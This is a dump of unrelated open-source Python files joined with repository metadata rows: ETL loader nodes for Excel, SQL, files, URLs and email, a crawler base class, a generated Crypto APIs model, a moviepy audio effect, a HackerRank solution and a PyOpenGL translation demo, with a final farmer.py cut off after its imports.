    def end(self):
        """Reset state in case the node gets reused"""
        self.writer = None
class ExcelLoad(SkipFalseNode):
    """Load data into an Excel file using pyexcel"""

    def run(
        self,
        rows,
        f,
        dict_rows=False,
        sheet_name="Sheet1",
        push_file=False,
        dry_run=False,
        **kwargs
    ):
        """Write rows to an Excel file, optionally as multiple sheets.

        Parameters
        ----------
        rows
            Iterable of rows to load to an Excel file, or a dict of
            sheet_name->iterable for multi-sheet loads.
        f : file or buffer
            File to write rows to
        dict_rows : bool, optional
            If true the rows of each sheet will be converted from dicts to
            lists (a header row of keys followed by rows of values)
        sheet_name : str, optional
            Sheet name to use if input is an iterable of rows. Unused otherwise.
        push_file : bool, optional
            If true, push the file forward instead of the data
        dry_run : bool, optional
            If true, skip actually loading the data
        **kwargs
            Keyword arguments passed to pyexcel
        """
        # Build the sheet_name->rows mapping in a fresh dict so the caller's
        # input (which is pushed downstream below) is never mutated. The
        # previous implementation rewrote the caller's dict in place when
        # dict_rows was set, which also made dict and list inputs push
        # different things.
        if isinstance(rows, dict):
            data = dict(rows)
        else:
            # Set up as a single sheet
            data = {sheet_name: rows}

        if dict_rows:
            for _sheet_name, sheet_data in data.items():
                # First row of each sheet becomes the header of dict keys
                header = [list(sheet_data[0].keys())]
                data[_sheet_name] = header + [list(x.values()) for x in sheet_data]

        if dry_run:
            warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
        else:
            save_excel(f, data, **kwargs)

        if push_file:
            self.push(f)
        else:
            self.push(rows)
class SQLLoad(SQLNode):
    """Generic SQL loader"""

    def run(
        self,
        rows,
        conn,
        table,
        cursor=None,
        commit=True,
        rollback=False,
        stmt_type="REPLACE",
        odku=False,
        swap=False,
        keep_old=False,
        push_data=False,
        dry_run=False,
    ):
        """Form SQL statement and use bulk execute to write rows to table

        Parameters
        ----------
        rows
            Iterable of rows to load to the table
        conn
            Database connection
        table : str
            Name of a table to write the data to
        cursor : optional
            Database connection cursor
        commit : bool, optional
            If true try to commit the transaction. If your connection
            autocommits this will have no effect. If this is a SQLAlchemy
            connection and you are in a transaction, it will try to get a
            reference to the current transaction and call commit on that.
        rollback : bool, optional
            If true try to rollback the transaction on exceptions. Behavior
            may vary by backend DB library if you are not currently in a
            transaction.
        stmt_type : str, optional
            Type of SQL statement to use (REPLACE, INSERT, etc.). **Note:** Backend
            support for this varies.
        odku : bool or list, optional
            If true, add ON DUPLICATE KEY UPDATE clause for all columns. If a
            list then only add it for the specified columns. **Note:** Backend
            support for this varies.
        swap : bool, optional
            If true, load a table and then swap it into the target table via rename.
            Not supported with all database back ends.
        keep_old : bool, optional
            If true and swapping tables, keep the original table with a __old
            suffix added to the name
        push_data : bool, optional
            If true, push the data forward instead of the table name
        dry_run : bool, optional
            If true, skip actually loading the data
        """
        load_table = table
        if swap:
            # Load into a temporary "__swap" table first, then rename it
            # into place once the load succeeds
            load_table = add_table_suffix(table, "__swap")

        sql = self.get_bulk_statement(conn, stmt_type, load_table, rows, odku=odku)
        dbg("Loading %d rows\n%s" % (size(rows, "n/a"), sqlformat(sql)), indent="label")

        if dry_run:
            warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
        else:
            if not cursor:
                cursor = self.get_sql_executor(conn)

            try:
                if swap:
                    # Recreate the swap table from the target table's schema
                    self.create_like(conn, cursor, load_table, table, drop=True)

                self.executemany(conn, cursor, sql, rows)

                if swap:
                    # Move the live table aside, promote the freshly loaded
                    # swap table, then optionally drop the old copy
                    old_table = add_table_suffix(table, "__old")
                    self.rename_tables(
                        conn, cursor, [(table, old_table), (load_table, table)]
                    )
                    if not keep_old:
                        self.drop_table(conn, cursor, old_table)

                if commit:
                    self.commit(conn)
            except:
                # Roll back on any failure (when requested) and re-raise
                if rollback:
                    self.rollback(conn)
                raise

        if push_data:
            self.push(rows)
        else:
            self.push(table)
class SQLTempLoad(SQLNode):
    """Generic SQL temp table loader"""

    def run(
        self,
        rows,
        conn,
        cursor=None,
        schema=None,
        commit=True,
        rollback=False,
        dry_run=False,
    ):
        """Create a temp table shaped like the rows and bulk load into it,
        then push the temp table's name.

        Parameters
        ----------
        rows
            Iterable of rows to load to the table
        conn
            Database connection
        cursor : optional
            Database connection cursor
        schema : str, optional
            Schema to create the temp table in
        commit : bool, optional
            If true, attempt a commit after loading (a no-op for
            autocommitting connections; for SQLAlchemy connections in a
            transaction, the current transaction is committed)
        rollback : bool, optional
            If true, attempt to roll back when the load raises; exact
            behavior varies by backend DB library outside a transaction
        dry_run : bool, optional
            If true, skip actually loading the data
        """
        tmp_table = get_temp_table(conn, rows, create=True, schema=schema)
        stmt = self.get_bulk_statement(conn, "REPLACE", tmp_table.name, rows)
        dbg("Loading %d rows\n%s" % (size(rows, "n/a"), sqlformat(stmt)), indent="label")

        if dry_run:
            warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
        else:
            executor = cursor or self.get_sql_executor(conn)
            try:
                self.executemany(conn, executor, stmt, rows)
                if commit:
                    self.commit(conn)
            except BaseException:
                if rollback:
                    self.rollback(conn)
                raise

        self.push(tmp_table.name)
class FileLoad(Node):
    """Load raw content to a file"""

    def run(self, data, f, open_flags="w", push_file=False, dry_run=False):
        """Write raw *data* to a file path or buffer and push.

        Parameters
        ----------
        data
            Data to write to file
        f : file path or buffer
            File path or buffer to write
        open_flags : str, optional
            Flags to pass to open() if f is not already an opened buffer;
            a "b" flag selects binary mode
        push_file : bool
            If true, push the file forward instead of the data
        dry_run : bool, optional
            If true, skip actually loading the data
        """
        text_mode = "b" not in open_flags
        fo, _, close = open_filepath_or_buffer(
            f, open_flags=open_flags, is_text=text_mode
        )

        try:
            if dry_run:
                warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
            else:
                fo.write(data)
        finally:
            if close:
                try:
                    fo.close()
                except ValueError:
                    # Some buffers raise ValueError when closed twice;
                    # treat that as already closed
                    pass

        self.push(f if push_file else data)
class URLLoad(Node):
    """Load data to URL with requests"""

    def run(
        self,
        data,
        url,
        data_param="data",
        session=None,
        skip_raise=False,
        dry_run=False,
        **kwargs
    ):
        """Load data to a URL with requests and push response.content. The url
        may be a string (POST that url) or a dictionary of args to
        requests.request:
        http://2.python-requests.org/en/master/api/?highlight=get#requests.request

        Parameters
        ----------
        data
            Data to load to the URL
        url : str or dict
            If str, a URL to POST to. If a dict, args to requets.request
        data_param : str, optional
            parameter to stuff data in when calling requests methods
        session : optional
            A requests Session to use to make the request
        skip_raise : bool, optional
            if False, raise exceptions for bad response status
        dry_run : bool, optional
            If true, skip actually loading the data
        **kwargs
            Keyword arguments to pass to the request method. If a dict is
            passed for the url parameter it overrides values here.
        """
        # Prefer the caller-supplied session so cookies/auth persist.
        http = session if session else requests
        if dry_run:
            warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
        else:
            if isinstance(url, str):
                raiseif(
                    "data" in kwargs or "json" in kwargs,
                    "Overriding data/json params is not allowed",
                )
                kwargs[data_param] = data
                resp = http.post(url, **kwargs)
            elif isinstance(url, dict):
                # Merge so dict-style url args win over plain kwargs.
                merged = deepcopy(kwargs)
                merged.update(url)
                raiseif(
                    "data" in merged or "json" in merged,
                    "Overriding data/json params is not allowed",
                )
                merged[data_param] = data
                resp = http.request(**merged)
            else:
                raise AssertionError(
                    "Input url must be a str or dict type, got %s" % type(url)
                )
            if not skip_raise:
                resp.raise_for_status()
        self.push(data)
class EmailLoad(Node):
    """Load data to email via SMTP"""
    def run(
        self,
        data,
        frm=None,
        to=None,
        subject=None,
        body=None,
        html=None,
        attach_as="attachment",
        attachment_name=None,
        formatter=None,
        client=None,
        host=None,
        port=None,
        username=None,
        password=None,
        dry_run=False,
    ):
        """Load data to email via SMTP.
        Parameters
        ----------
        data
            EmailMessage or data to send. If the latter, the message will be
            created from the other node arguments.
        frm : str, optional
            The from email address
        to : str or list, optional
            A str or list of destination email addresses
        subject : str, optional
            The email subject
        body : str, optional
            The email text body
        html : str, optional
            The email html body
        attach_as : str
            Where to put the data in the email message if building the message
            from node arguments. Options: attachment, body, html.
        attachment_name: str, optional
            The file name to write the data to when attaching data to the
            email. The file extension will be used to infer the mimetype of
            the attachment. This should not be a full path as a temp directory
            will be created for this.
        formatter : callable
            A function to format and return a string from the input data if
            attach_as is set to "body" or "html".
        client : optional
            A connected smtplib.SMTP client
        host : str, optional
            The SMTP host to connect to if no client is provided
        port : int, optional
            The SMTP port to connect to if no client is provided
        username : str, optional
            The SMTP username for login if no client is provided
        password : str, optional
            The SMTP password for login if no client is provided
        dry_run : bool, optional
            If true, skip actually loading the data
        """
        if isinstance(data, EmailMessage):
            # Pre-built message: send it as-is, ignoring the builder args.
            msg = data
        else:
            # Assume its data that needs to be converted to attachments and sent
            raiseifnot(
                frm and to and subject,
                "Node context must have frm/to/subject set to create an email msg",
            )
            raiseifnot(
                isinstance(data, str),
                "data must be passed as raw str content, got %s" % type(data),
            )
            attachments = None
            tmpdir = None
            if attach_as == "attachment":
                raiseifnot(
                    attachment_name,
                    "Must specify an attachment_name when attach_as = attachment",
                )
                # Write data to a temp file so create_email can attach it by
                # filename (mimetype inferred from the extension).
                tmpdir = tempfile.TemporaryDirectory()
                filename = tmpdir.name + "/" + attachment_name
                with open(filename, "w") as f:
                    f.write(data)
                attachments = [filename]
            else:
                # Inline the (optionally formatted) data into body or html.
                fmt_data = formatter(data) if formatter else data
                if attach_as == "body":
                    body = (body or "") + fmt_data
                elif attach_as == "html":
                    html = (html or "") + fmt_data
                else:
                    raise AssertionError(
                        "Invalid attach_as value: %s, options: attachment, body, html"
                        % attach_as
                    )
            msg = create_email(
                frm, to, subject, body=body, html=html, attachments=attachments
            )
            # Temp dir removed after message construction; assumes create_email
            # has already read the attachment contents — TODO confirm.
            if tmpdir:
                tmpdir.cleanup()
        if dry_run:
            warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
        else:
            dbg("Sending msg %s to %s" % (msg["Subject"], msg["To"]))
            send_email(
                msg,
                client=client,
                host=host,
                port=port,
                username=username,
                password=password,
            )
        # The original input data is pushed forward, not the message object.
        self.push(data)
# Append the loader/printer Node subclasses defined in this module to the
# module docstring so they show up in generated documentation.
node_names = find_class_in_dict(Node, locals(), include="Load")
node_names.extend(find_class_in_dict(Node, locals(), include="Print"))
if node_names:
    __doc__ = __doc__ + get_class_list_docstring("Nodes", node_names)
| 30.5469 | 104 | 0.536224 |
a8eaa7dcef5a2c10d313aec9db484d33a2e124c7 | 385 | py | Python | crawlib2/tests/dummy_site_crawler/site/s2_music/entity_base.py | MacHu-GWU/crawlib2-project | 618d72522d5b36d40607b53b7de7623976460712 | [
"MIT"
] | null | null | null | crawlib2/tests/dummy_site_crawler/site/s2_music/entity_base.py | MacHu-GWU/crawlib2-project | 618d72522d5b36d40607b53b7de7623976460712 | [
"MIT"
] | null | null | null | crawlib2/tests/dummy_site_crawler/site/s2_music/entity_base.py | MacHu-GWU/crawlib2-project | 618d72522d5b36d40607b53b7de7623976460712 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import requests
from crawlib2.entity.mongodb.entity import MongodbEntitySingleStatus
class MusicWebsiteEntity(MongodbEntitySingleStatus):
    """Abstract base entity for the dummy music-site crawler."""

    meta = {
        "abstract": True,
    }

    def build_request(self, url, **kwargs):
        """For this site the URL itself serves as the request object."""
        return url

    def send_request(self, request, **kwargs):
        """Fetch the prepared request with a plain HTTP GET."""
        return requests.get(request)
| 21.388889 | 68 | 0.67013 |
57e6b58d0ab6d8517b7fa682a35f030008d15625 | 13,365 | py | Python | cryptoapis/model/broadcast_locally_signed_transaction_rb_data_item.py | Crypto-APIs/Crypto_APIs_2.0_SDK_Python | c59ebd914850622b2c6500c4c30af31fb9cecf0e | [
"MIT"
] | 5 | 2021-05-17T04:45:03.000Z | 2022-03-23T12:51:46.000Z | cryptoapis/model/broadcast_locally_signed_transaction_rb_data_item.py | Crypto-APIs/Crypto_APIs_2.0_SDK_Python | c59ebd914850622b2c6500c4c30af31fb9cecf0e | [
"MIT"
] | null | null | null | cryptoapis/model/broadcast_locally_signed_transaction_rb_data_item.py | Crypto-APIs/Crypto_APIs_2.0_SDK_Python | c59ebd914850622b2c6500c4c30af31fb9cecf0e | [
"MIT"
] | 2 | 2021-06-02T07:32:26.000Z | 2022-02-12T02:36:23.000Z | """
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: developers@cryptoapis.io
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from cryptoapis.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from cryptoapis.exceptions import ApiAttributeError
class BroadcastLocallySignedTransactionRBDataItem(ModelNormal):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      attribute_map (dict): The key is attribute name
          and the value is json key in definition.
      discriminator_value_class_map (dict): A dict to go from the discriminator
          variable value to the discriminator class name.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """
    # No enum-restricted or validated properties for this model.
    allowed_values = {
    }
    validations = {
    }
    @cached_property
    def additional_properties_type():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        """
        return (bool, date, datetime, dict, float, int, list, str, none_type,)  # noqa: E501
    _nullable = False
    @cached_property
    def openapi_types():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        return {
            'signed_transaction_hex': (str,),  # noqa: E501
            'callback_secret_key': (str,),  # noqa: E501
            'callback_url': (str,),  # noqa: E501
        }
    @cached_property
    def discriminator():
        return None
    # Maps pythonic attribute names to the JSON keys used on the wire.
    attribute_map = {
        'signed_transaction_hex': 'signedTransactionHex',  # noqa: E501
        'callback_secret_key': 'callbackSecretKey',  # noqa: E501
        'callback_url': 'callbackUrl',  # noqa: E501
    }
    read_only_vars = {
    }
    _composed_schemas = {}
    # NOTE: _from_openapi_data and __init__ below are near-duplicate generated
    # constructors; _from_openapi_data is the deserialization path and may set
    # read-only attributes, while __init__ rejects them.
    @classmethod
    @convert_js_args_to_python_args
    def _from_openapi_data(cls, signed_transaction_hex, *args, **kwargs):  # noqa: E501
        """BroadcastLocallySignedTransactionRBDataItem - a model defined in OpenAPI
        Args:
            signed_transaction_hex (str): Represents the signed transaction's specific hex.
        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
            callback_secret_key (str): Represents the Secret Key value provided by the customer. This field is used for security purposes during the callback notification, in order to prove the sender of the callback as Crypto APIs. For more information please see our [Documentation](https://developers.cryptoapis.io/technical-documentation/general-information/callbacks#callback-security).. [optional]  # noqa: E501
            callback_url (str): Represents the URL that is set by the customer where the callback will be received at. The callback notification will be received only if and when the event occurs.. [optional]  # noqa: E501
        """
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        self = super(OpenApiModel, cls).__new__(cls)
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        self.signed_transaction_hex = signed_transaction_hex
        for var_name, var_value in kwargs.items():
            if var_name not in self.attribute_map and \
                    self._configuration is not None and \
                    self._configuration.discard_unknown_keys and \
                    self.additional_properties_type is None:
                # discard variable.
                continue
            setattr(self, var_name, var_value)
        return self
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
    ])
    @convert_js_args_to_python_args
    def __init__(self, signed_transaction_hex, *args, **kwargs):  # noqa: E501
        """BroadcastLocallySignedTransactionRBDataItem - a model defined in OpenAPI
        Args:
            signed_transaction_hex (str): Represents the signed transaction's specific hex.
        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
            callback_secret_key (str): Represents the Secret Key value provided by the customer. This field is used for security purposes during the callback notification, in order to prove the sender of the callback as Crypto APIs. For more information please see our [Documentation](https://developers.cryptoapis.io/technical-documentation/general-information/callbacks#callback-security).. [optional]  # noqa: E501
            callback_url (str): Represents the URL that is set by the customer where the callback will be received at. The callback notification will be received only if and when the event occurs.. [optional]  # noqa: E501
        """
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        self.signed_transaction_hex = signed_transaction_hex
        for var_name, var_value in kwargs.items():
            if var_name not in self.attribute_map and \
                    self._configuration is not None and \
                    self._configuration.discard_unknown_keys and \
                    self.additional_properties_type is None:
                # discard variable.
                continue
            setattr(self, var_name, var_value)
            if var_name in self.read_only_vars:
                raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
                                     f"class with read only attributes.")
| 49.317343 | 484 | 0.606584 |
982892aeec70ac327f51ea785780d9e3b379ddf4 | 1,068 | py | Python | moviepy/audio/fx/multiply_stereo_volume.py | andriyor/moviepy | 8eaf3f02c5cf812e89f03e925cb2fa5e05b8d29a | [
"MIT"
] | 8,558 | 2015-01-03T05:14:12.000Z | 2022-03-31T21:45:38.000Z | moviepy/audio/fx/multiply_stereo_volume.py | andriyor/moviepy | 8eaf3f02c5cf812e89f03e925cb2fa5e05b8d29a | [
"MIT"
] | 1,592 | 2015-01-02T22:12:54.000Z | 2022-03-30T13:10:40.000Z | moviepy/audio/fx/multiply_stereo_volume.py | andriyor/moviepy | 8eaf3f02c5cf812e89f03e925cb2fa5e05b8d29a | [
"MIT"
] | 1,332 | 2015-01-02T18:01:53.000Z | 2022-03-31T22:47:28.000Z | from moviepy.decorators import audio_video_fx
@audio_video_fx
def multiply_stereo_volume(clip, left=1, right=1):
    """Scale the left and right channels of a stereo audio clip separately.

    The factors ``left`` and ``right`` multiply the volume of the odd and
    even channels respectively, producing a clip whose per-side loudness is
    independently controllable.

    Examples
    --------
    >>> from moviepy import AudioFileClip
    >>> music = AudioFileClip('music.ogg')
    >>> audio_r = music.multiply_stereo_volume(left=0, right=1)  # mute left channel/s
    >>> audio_h = music.multiply_stereo_volume(left=0.5, right=0.5)  # half audio
    """
    def scale_channels(get_frame, t):
        frame = get_frame(t)
        if len(frame) == 1:
            # Mono: a single factor applies to the whole frame.
            frame *= left if left is not None else right
            return frame
        # Stereo / surround: even channel indices are left, odd are right.
        for channel in range(len(frame[0])):
            frame[:, channel] *= left if channel % 2 == 0 else right
        return frame

    return clip.transform(scale_channels, keep_duration=True)
| 35.6 | 86 | 0.647004 |
bdf46a23ef6b4fc59e2a5c6a2c6ec7fa14f9965e | 141 | py | Python | Python/tuples.py | HarshitRuwali/HackerRank-Solutions | 29c3ebd87723e1237866a551783bf62cf470d919 | [
"MIT"
] | 8 | 2020-07-16T12:17:16.000Z | 2022-01-11T04:24:03.000Z | Python/tuples.py | HarshitRuwali/HackerRank-Solutions | 29c3ebd87723e1237866a551783bf62cf470d919 | [
"MIT"
] | null | null | null | Python/tuples.py | HarshitRuwali/HackerRank-Solutions | 29c3ebd87723e1237866a551783bf62cf470d919 | [
"MIT"
] | 5 | 2020-11-30T17:40:15.000Z | 2022-02-28T11:26:59.000Z | if __name__ == '__main__':
n = int(input())
integer_list = map(int, input().split())
t = tuple(integer_list)
print(hash(t))
| 20.142857 | 44 | 0.588652 |
ddc5d2ee2a30bcb6f13ae918986ab688e68b7b18 | 4,259 | py | Python | Computer Graphics/OpenGL 2D/Transformations/3.CircleTranslation.py | henriquesqs/Codes | 59e5bb683f3de2ee1b13621569954be1e4f37396 | [
"MIT"
] | null | null | null | Computer Graphics/OpenGL 2D/Transformations/3.CircleTranslation.py | henriquesqs/Codes | 59e5bb683f3de2ee1b13621569954be1e4f37396 | [
"MIT"
] | 1 | 2021-09-21T03:26:14.000Z | 2021-09-21T03:26:14.000Z | Computer Graphics/OpenGL 2D/Transformations/3.CircleTranslation.py | henriquesqs/Codes | 59e5bb683f3de2ee1b13621569954be1e4f37396 | [
"MIT"
] | 1 | 2020-03-31T01:49:23.000Z | 2020-03-31T01:49:23.000Z | import glfw
from OpenGL.GL import *
import OpenGL.GL.shaders
import numpy as np
import math
def translation(tx=None, ty=None):
    """Build a flattened 4x4 row-major translation matrix (16 float32s).

    Parameters
    ----------
    tx, ty : float, optional
        Translation offsets. When omitted, the module-level ``t_x``/``t_y``
        (updated by keyboard input) are used, preserving the original
        zero-argument behavior.
    """
    if tx is None:
        tx = t_x
    if ty is None:
        ty = t_y
    return np.array([1.0, 0.0, 0.0, tx,
                     0.0, 1.0, 0.0, ty,
                     0.0, 0.0, 1.0, 0.0,
                     0.0, 0.0, 0.0, 1.0], np.float32)
def key_event(window, key, scancode, action, mods):
    """GLFW key callback: print the event and nudge the global translation
    offsets with WASD (printable GLFW key codes equal ASCII uppercase)."""
    print('[key event] key=', key)
    print('[key event] scancode=', scancode)
    print('[key event] action=', action)
    print('[key event] mods=', mods)
    print('-------')
    global t_x, t_y
    if key == 87: # W: move up
        t_y += 0.01
    if key == 83: # S: move down (was mislabeled "A")
        t_y -= 0.01
    if key == 65: # A: move left (was mislabeled "S")
        t_x -= 0.01
    if key == 68: # D: move right
        t_x += 0.01
def init_window():
    """Create a hidden 720x600 GLFW window with a current GL context and the
    keyboard callback installed; shown later by show_window()."""
    glfw.init()
    # Keep the window hidden until setup completes.
    glfw.window_hint(glfw.VISIBLE, glfw.FALSE)
    window = glfw.create_window(720, 600, "CircleTranslation", None, None)
    glfw.make_context_current(window)
    glfw.set_key_callback(window, key_event) # gets keyboard inputs
    return window
def set_and_compile_shader(program, slot, slot_code):
    """Upload slot_code into shader object `slot`, compile it, and attach it
    to `program`. Raises RuntimeError (after printing the GL log) on failure."""
    # Set shaders source
    glShaderSource(slot, slot_code)
    # Compiler shaders source
    glCompileShader(slot)
    if not glGetShaderiv(slot, GL_COMPILE_STATUS):
        error = glGetShaderInfoLog(slot).decode()
        print(error)
        raise RuntimeError("Shader compilation error")
    # Attach shader objects to the program
    glAttachShader(program, slot)
def draw_object(num_vertices=64, radius=0.2):
    """Compute the 2D vertices of a circle centered at the origin.

    Parameters
    ----------
    num_vertices : int, optional
        Number of points on the circle — defines its "quality" (smoothness).
    radius : float, optional
        Circle radius in normalized device coordinates.

    Returns
    -------
    numpy structured array of length num_vertices with a float32
    "position" field of shape (2,) per vertex.
    """
    vertices = np.zeros(num_vertices, [("position", np.float32, 2)])
    angle = 1.0  # starting phase, kept from the original implementation
    for i in range(num_vertices):
        # BUGFIX: use math.pi instead of the truncated 3.14 so the points
        # sweep a full 2*pi and the triangle fan closes cleanly.
        angle += 2 * math.pi / num_vertices
        vertices[i] = [math.cos(angle) * radius, math.sin(angle) * radius]
    return vertices
def send_to_gpu(vertices):
    """Allocate a GL buffer, upload the vertex array into it, and return the
    buffer id (left bound to GL_ARRAY_BUFFER)."""
    # Request a buffer slot from GPU
    buffer = glGenBuffers(1)
    # Make this buffer the default one
    glBindBuffer(GL_ARRAY_BUFFER, buffer)
    # Upload data
    glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_DYNAMIC_DRAW)
    # NOTE(review): this second bind appears redundant — the buffer is
    # already bound above; confirm before removing.
    glBindBuffer(GL_ARRAY_BUFFER, buffer)
    return buffer
def show_window(window, program, loc, loc_color, vertices):
    """Show the window and run the render loop: each frame clears to white,
    uploads the current translation matrix, and draws the circle as a
    gray triangle fan. Terminates GLFW when the window is closed."""
    glfw.show_window(window)
    while not glfw.window_should_close(window):
        glfw.poll_events()
        glClear(GL_COLOR_BUFFER_BIT)
        glClearColor(1.0, 1.0, 1.0, 1.0)
        # Draw Circle
        # NOTE(review): this zeros matrix is immediately overwritten by
        # translation() below — likely dead code.
        mat_translation = np.zeros((4, 4), np.float32)
        mat_translation = translation()
        # The incoming `loc` parameter is shadowed here each frame.
        loc = glGetUniformLocation(program, "mat_transformation")
        # GL_TRUE transposes: translation() builds a row-major matrix.
        glUniformMatrix4fv(loc, 1, GL_TRUE, mat_translation)
        glUniform4f(loc_color, 0.521, 0.521, 0.521, 1)
        glDrawArrays(GL_TRIANGLE_FAN, 0, len(vertices))
        glfw.swap_buffers(window)
    glfw.terminate()
def init():
    """Set up the window, shaders, and vertex data, then enter the render
    loop via show_window()."""
    window = init_window()
    # GLSL sources: vertex shader applies the translation matrix; fragment
    # shader outputs a uniform color.
    vertex_code = """
            attribute vec2 position;
            uniform mat4 mat_transformation;
            void main(){
                gl_Position = mat_transformation * vec4(position,0.0,1.0);
            }
            """
    fragment_code = """
            uniform vec4 color;
            void main(){
                gl_FragColor = color;
            }
            """
    # Request a program and shader slots from GPU
    program = glCreateProgram()
    vertex = glCreateShader(GL_VERTEX_SHADER)
    fragment = glCreateShader(GL_FRAGMENT_SHADER)
    set_and_compile_shader(program, vertex, vertex_code)
    set_and_compile_shader(program, fragment, fragment_code)
    # Build program
    glLinkProgram(program)
    if not glGetProgramiv(program, GL_LINK_STATUS):
        print(glGetProgramInfoLog(program))
        raise RuntimeError('Linking error')
    # Make program the default program
    glUseProgram(program)
    vertices = draw_object()
    buffer = send_to_gpu(vertices)
    # Bind the position attribute
    stride = vertices.strides[0]
    offset = ctypes.c_void_p(0)
    loc = glGetAttribLocation(program, "position")
    glEnableVertexAttribArray(loc)
    glVertexAttribPointer(loc, 2, GL_FLOAT, False, stride, offset)
    loc_color = glGetUniformLocation(program, "color")
    show_window(window, program, loc, loc_color, vertices)
# Module-level translation offsets, mutated by key_event() on WASD input and
# read by translation() every frame.
t_x = 0
t_y = 0
init()
| 23.401099 | 77 | 0.638413 |
1b489f0516c6b11ca57ae9aa41fbede86fed092a | 35,415 | py | Python | mint/farmer/farmer.py | sai-genesis/rc1-test | 56e565952b283450c8589296f87c31b1c67b8502 | [
"Apache-2.0"
] | null | null | null | mint/farmer/farmer.py | sai-genesis/rc1-test | 56e565952b283450c8589296f87c31b1c67b8502 | [
"Apache-2.0"
] | null | null | null | mint/farmer/farmer.py | sai-genesis/rc1-test | 56e565952b283450c8589296f87c31b1c67b8502 | [
"Apache-2.0"
] | null | null | null | import asyncio
import json
